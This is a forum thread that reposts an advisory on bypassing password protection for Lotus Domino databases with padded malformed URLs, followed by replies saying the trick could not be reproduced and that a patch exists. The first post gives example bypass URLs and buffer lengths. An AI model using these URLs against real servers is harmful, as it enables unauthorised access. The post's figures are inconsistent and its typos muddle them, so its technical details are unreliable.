Results 1 to 6 of 6

Thread: Bypass Lotus Domino password protected url

  1. #1
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    Bypass Lotus Domino password protected url

    A security vulnerability has been found in the popular Lotus Domino Web server.
    Lotus Domino have files like webadmin.nsf, log.nsf and names.nfs, this files
    are protected by password. It is discover that is posible to bypass this password
    if you create a malformed url.


    Notes Databases '.nsf' like webadmin.nsf or log.nsf are store in "lotus/domino/
    data/" directory nas Notes Templatesi '.ntf' are store in the same place (Here
    is the goal).


    Examples:
    There is a critical and max length.

    assuming the buffer is: http://host.com//

    Critical buffer length: is the minimun buffer length you need to bypass the
    passwd file.

    normal url: http://host.com/log.nsf .snf/
    |-----217 -------|

    In the case of log.nsf, is 217 - 12 = 205 '+' and the url will be:

    http://host.com/log.ntf++++++++++++++++++++.nsf/
    |-------- 205 -----|


    If you write a buffer between 219 and 257(higher buffer), you bypass the
    passwd.
    modify url: http://host.com/log.ntf.snf/
    |---219 to 257 --|

  2. #2
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    cool post..
    I didn't know yet.

    thanks for the info. (not that I'm running lotus...)
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  3. #3
    Senior Member
    Join Date
    Jan 2002
    Posts
    882
    I was thinking. Wonder if IBM is going to change it's Lotus line up now that it is embracing Linux on a large scale in it's new line up of servers?
    Anyway. Lotus has always been better than Exchange in many respects. At one point IBM could have had more great products. The SmartSuit Millinium Edition office package was realy nice and worked well. As well, the Notes client is fairly robust. It seems IBM is always at the forefront of new technology, or has a good long term product. Then for some unknown reason. Thay always drop the ball. MS is a good example. Big Blue got the shaft from them early on and helped seat MS in the posistion it is today. Go figure.
    The COOKIE TUX lives!!!!
    Windows NT crashed,I am the Blue Screen of Death.
    No one hears your screams.


  4. #4
    Junior Member
    Join Date
    Jan 2002
    Posts
    11
    I'm running Domino 5.0.8. I attempted to go to http://domino/log.ntf. I got a password screen. I attempted to go to http://domino/log.ntf++++++++++++++++++++.nsf/. I got a 404 file not found. I attempted to go to http://domino/log.ntf.snf. I still get a 404 file not found.

    If I read your post correctly, using such a malformed URL should bypass the password.... I can't duplicate this problem. Is it fixed in 5.0.8?

    Thanks,
    -Will Tyler
    -wct097@yahoo.com

  5. #5
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584
    im sorry but im afraid that the version of the software wasnt mentioned in my sources... i too am looking for what version it is.. but i cant find any..

  6. #6
    Junior Member
    Join Date
    Jan 2002
    Posts
    16

    Exclamation

    Hi all,
    Checking my resources on the issue: "the bugtraq". The problem appears on Domino 5.0.8 and earlier , Lotus have been informed and there is a patch for this.
    Cheers!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •